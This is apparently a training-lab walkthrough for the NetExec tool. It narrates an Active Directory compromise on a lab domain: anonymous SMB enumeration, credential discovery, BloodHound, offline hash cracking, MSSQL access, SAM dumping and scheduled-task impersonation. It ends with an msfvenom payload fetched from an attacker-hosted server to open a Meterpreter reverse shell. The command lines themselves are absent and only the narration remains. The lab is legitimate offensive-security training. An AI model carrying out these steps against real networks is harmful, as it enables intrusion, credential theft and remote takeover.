💃NetExec Training Lab
Here is my infrastructure for this lab:
I start by creating a host file with all my possible targets:
We can confirm the hosts are up with the following command:
Here we have a list of all our targets but if we wanted to discover hosts from scratch we could've done the following command:
It's long so i did not do it all but here is what it looks like:
First i'll try to enumerate without any credentials:
Now i'll go and try to get some shares with the guest user:
Obviously i'll enumerate all the shares at once so we can win some time:
Here i'd try and get the files with smbclient but since this is a nxc lab i'll stay in scope
(here is the smbclient command i would've used:)
Funny enough the anonymous user can also enumerate the shares:
Then i saw that whatever user even if he does not exist can enumerate 😂
To enumerate the shares we can do it many ways but we are going to keep it simple ->
We see the folder where out output is stored but since we don't have access to the files we can't access anything:
Obviously we can spray a bit more on a whole list of targets with our host file:
Now we are going to try and find some users that may have some more privileges to read shares ->
So first we are going to try some null credentials ->
We can see a user with a set of credentials, bingo 🎉
SO now it's going to be real easy to enumerate the shares:
So we can see that we can access way more shares, let's download everything:
While checking the spiderplus folder we can see more then 1 file;
in the first folder we can go very deep, we'll check that out later:
And in the other file we got the Share named Secret from earlier with an interesting note:
Another good thing to do is validate the credentials and check on which host they work:
If you see a green 🟩 plus sign ➕ on the output lines where it lists the hosts, this means the authentication worked!
❗Note, this only validates access over SMB, as that was our chosen protocol. This alone does not mean that other forms of access like the remote desktop protocol or others would work just as well.
Now we are going to play around with bloodhound:
First we can log in through the web interface, but we quickly see that there is no data imported:
Next, we need to retrieve the information that Bloodhound can work with. Traditionally we would use something like SharpHound
or other tools and do that semi-manually, but NetExec
makes this even easier for us! ➡️
This will create a ZIP file, but we are more interested in the JSON files that are created in our current directory.
If you return the Bloodhound user interface within Firefox, you can click to go to the File Ingest page and then upload files.
⬆️ Click the button to upload the data
📂 Navigate in the file explorer to the location of your new JSON files
⌨️ Hold Shift to click and select all of the JSON files created by NetExec.
🖱️ Click Upload.
✅ Confirm these are the files that you would like, and click Upload once more.
Then we can go in the explore page to start and look at everything:
You can Search for any object, like DOMAIN COMPUTERS@NETEXEC.LAB
, and explore its properties, and explore what has relationships with what across the environment.
What we can do is toggle the search on the left-hind side to Cypher. This allows you to enter a totally custom search query in syntax, but we can click the 📂 folder icon to see some already suggested and provided queries.
Scrolling down the list, one entry might be especially useful for us:
so now we got our initial attack path:
To go even quicker we even specified the output file so we can start cracking the hash offline ->
Let's use john to crack all of this:
So we got our password, since this is an sql user we can assume that mssql is running, let's check:
So now let's try accessing the database ->
so if we don't know what to do we can use the famous help command ->
We are going to start by enumerating the database with the
command ->
Ok so i think we can guess where we have to go next ->
So now that we got a new domain user, let's go back to bloodhound and add the freshly compromised user to owned:
And we can go and look to see who is this user in the domain in the 'Member Of' section:
The FSADMIN group is very interesting
let's take the credentials and try to see where we get some action ->
the (Pwned!)
message on the line for the host means this account is a local administrator on the file server! bingo, that means we can get remote code execution ->
So nothing stops us from using other sweet tooling from NetExec
. We can even easily dump the SAM database to find more hashes to crack!
Another good thing to know is that it is even capable to look for logged in users ->
We can see one new domain user that actually comes from a logon_server: DC01
Now our goal will be to impersonate an admin ->
NetExec
gets clever, and can actualy use scheduled tasks to immediately invoke a command as any logged in user that we would like
Now the move would be to get a reverse shell, let's craft a payload with msfvenom ->
Now let's open a new tab, run msfconsole and set up a listener:
Next, we need to get our payload.exe
on the target file server host!
Let's first split our terminal again and set up a python server to host our payload:
Now let's make our target fetch our payload on our local server, and then execute it to get our reverse shell
We got the two things that said that our exploit worked:
Your Python HTTP server receive a
GET
request for ourpayload.exe
and return a200
status code for sucessYour Metasploit handler display:
Meterpreter session 1 opened
We got our callback! 🔥
And just like that we are domain admin 🎉
Last updated